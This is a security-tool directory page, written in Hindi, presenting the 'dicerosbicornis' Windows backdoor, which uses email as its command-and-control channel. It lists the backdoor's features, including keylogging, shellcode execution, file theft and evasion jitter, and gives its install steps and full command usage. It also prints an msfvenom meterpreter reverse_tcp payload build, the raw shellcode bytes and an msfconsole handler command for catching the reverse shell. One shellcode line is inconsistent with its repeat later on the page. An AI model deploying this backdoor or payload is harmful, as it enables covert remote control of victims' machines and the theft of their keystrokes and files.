Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
dicerosbicornis — एक पूर्ण विशेषताओं वाला विंडोज़ बैकडोर जो ईमेल को C&C सर्वर के रूप में उपयोग करता है | Kitploit
उपकरण/GitHubGitHub/maldevel/dicerosbicornis
एन्क्रिप्शन/डिक्रिप्शन उपकरणशेलकोडडेटा निष्कासनजानकारी एकत्र करनापोस्ट-शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubmaldevel/dicerosbicornis

dicerosbicornis

एक पूर्ण विशेषताओं वाला विंडोज़ बैकडोर जो ईमेल को C&C सर्वर के रूप में उपयोग करता है

रिपॉजिटरी देखें
161119 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

DicerosBicornis

एक गुप्त पायथन-आधारित विंडोज बैकडोर जो कमांड और कंट्रोल सर्वर के रूप में ईमेल का उपयोग करता है।

आवश्यकताएँ

  • Python 2.x
  • PyCrypto मॉड्यूल
  • WMI मॉड्यूल
  • Enum34 मॉड्यूल
  • Netifaces मॉड्यूल
  • pypiwin32 मॉड्यूल

विशेषताएँ

  • एन्क्रिप्टेड संदेश परिवहन (AES) + SHA256 हैशिंग
  • सिस्टम जानकारी/विशेषताओं का उपयोग करके कंप्यूटर अद्वितीय आईडी उत्पन्न करें (SHA256 हैश)
  • जॉब आईडी यादृच्छिक SHA256 हैश होते हैं
  • सिस्टम जानकारी प्राप्त करें
  • भौगोलिक स्थान जानकारी प्राप्त करें (शहर, देश, अक्षांश, देशांतर, आदि)
  • चल रही प्रक्रियाओं/सिस्टम सेवाओं/सिस्टम उपयोगकर्ताओं/उपकरणों (हार्डवेयर) को प्राप्त करें
  • क्लाइंट की सूची प्राप्त करें
  • सिस्टम कमांड निष्पादित करें
  • क्लाइंट से फ़ाइलें डाउनलोड करें
  • क्लाइंट पर फ़ाइलें अपलोड करें
  • शेलकोड निष्पादित करें
  • स्क्रीनशॉट लें
  • क्लाइंट की स्क्रीन लॉक करें
  • कीलॉगर
  • दूरस्थ कंप्यूटर की स्क्रीन लॉक करें
  • दूरस्थ कंप्यूटर बंद करें/पुनः आरंभ करें
  • वर्तमान उपयोगकर्ता को लॉग ऑफ करें
  • वेब से फ़ाइल डाउनलोड करें
  • वेबसाइट पर जाएँ
  • उपयोगकर्ता को संदेश बॉक्स दिखाएँ
  • चेक-इन समय बदलने की क्षमता
  • चेक-इन समय में जिटर जोड़ने की क्षमता ताकि पूर्वानुमान कम हो

सेटअप

इसके काम करने के लिए आपको चाहिए:

  • एक मेल खाता

डाउनलोड/इंस्टॉलेशन

  • https://sourceforge.net/projects/pywin32
  • git clone https://github.com/maldevel/dicerosbicornis
  • pip install -r requirements.txt

सामग्री

  • dicerosbicornis.py एक स्क्रिप्ट जिसका उपयोग उपलब्ध क्लाइंट्स को सूचीबद्ध करने और उन्हें कमांड जारी करने के लिए किया जाता है
  • client.py वास्तविक बैकडोर जिसे तैनात किया जाना है

आप शायद Pyinstaller का उपयोग करके client.py को एक निष्पादन योग्य में संकलित करना चाहेंगे

नोट: क्लाइंट.py को 32-बिट पायथन इंस्टॉलेशन का उपयोग करके संकलित करने की अनुशंसा की जाती है

उपयोग

root@kitploit:~
usage: dicerosbicornis.py [-h] [-v] [-id ID] [-jobid JOBID] [-list | -info]
                          [-cmd CMD | -visitwebsite URL | -message TEXT TITLE | -tasks | -services | -users | -devices | -download PATH | -download-fromurl URL | -upload SRC DST | -exec-shellcode FILE | -screenshot | -lock-screen | -shutdown | -restart | -logoff | -force-checkin | -start-keylogger | -stop-keylogger | -email-checkin CHECK | -jitter jit]

optional arguments:
  -h, --help            यह सहायता संदेश दिखाएँ और बाहर निकलें
  -v, --version         प्रोग्राम का संस्करण नंबर दिखाएँ और बाहर निकलें
  -id ID                लक्षित क्लाइंट
  -jobid JOBID          प्राप्त करने के लिए जॉब आईडी

  -list                 उपलब्ध क्लाइंट्स की सूची बनाएँ
  -info                 निर्दिष्ट क्लाइंट पर जानकारी प्राप्त करें

Commands:
  क्लाइंट पर निष्पादित करने के लिए आदेश

  -cmd CMD              एक सिस्टम कमांड निष्पादित करें
  -visitwebsite URL     वेबसाइट पर जाएँ
  -message TEXT TITLE   उपयोगकर्ता को संदेश दिखाएँ
  -tasks                चल रही प्रक्रियाएँ प्राप्त करें
  -services             सिस्टम सेवाएँ प्राप्त करें
  -users                सिस्टम उपयोगकर्ता प्राप्त करें
  -devices              उपकरण (हार्डवेयर) प्राप्त करें
  -download PATH        क्लाइंट सिस्टम से एक फ़ाइल डाउनलोड करें
  -download-fromurl URL
                        वेब से एक फ़ाइल डाउनलोड करें
  -upload SRC DST       क्लाइंट सिस्टम पर एक फ़ाइल अपलोड करें
  -exec-shellcode FILE  क्लाइंट पर दिए गए शेलकोड को निष्पादित करें
  -screenshot           स्क्रीनशॉट लें
  -lock-screen          क्लाइंट की स्क्रीन लॉक करें
  -shutdown             दूरस्थ कंप्यूटर बंद करें
  -restart              दूरस्थ कंप्यूटर पुनः आरंभ करें
  -logoff               वर्तमान दूरस्थ उपयोगकर्ता को लॉग ऑफ करें
  -force-checkin        चेक-इन बलपूर्वक करें
  -start-keylogger      कीलॉगर शुरू करें
  -stop-keylogger       कीलॉगर बंद करें
  -email-checkin CHECK  नए कमांड की जाँच करने से पहले प्रतीक्षा करने के लिए सेकंड
  -jitter jit           जिटर का प्रतिशत

शेलकोड निष्पादन

root@kitploit:~
$ ./msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform Windows EXITFUNC=thread LPORT=4444 LHOST=x.x.x.x -f python

No encoder or badchars specified, outputting raw payload
Payload size: 354 bytes
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x6a\x05\x68\xac\x10\x99\x01\x68\x02\x00\x11"
buf += "\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
buf += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
buf += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
buf += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
buf += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0"
buf += "\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
buf += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00"
buf += "\x53\xff\xd5"

शेलकोड को छोड़कर बाकी सब कुछ हटा दें और इसे एक फ़ाइल में डालें:

root@kitploit:~
$ cat shell.txt 
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\xac\x10\x99\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5

कंसोल चलाएँ

root@kitploit:~
 ./msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST x.x.x.x; run"
टूल डाउनलोड करें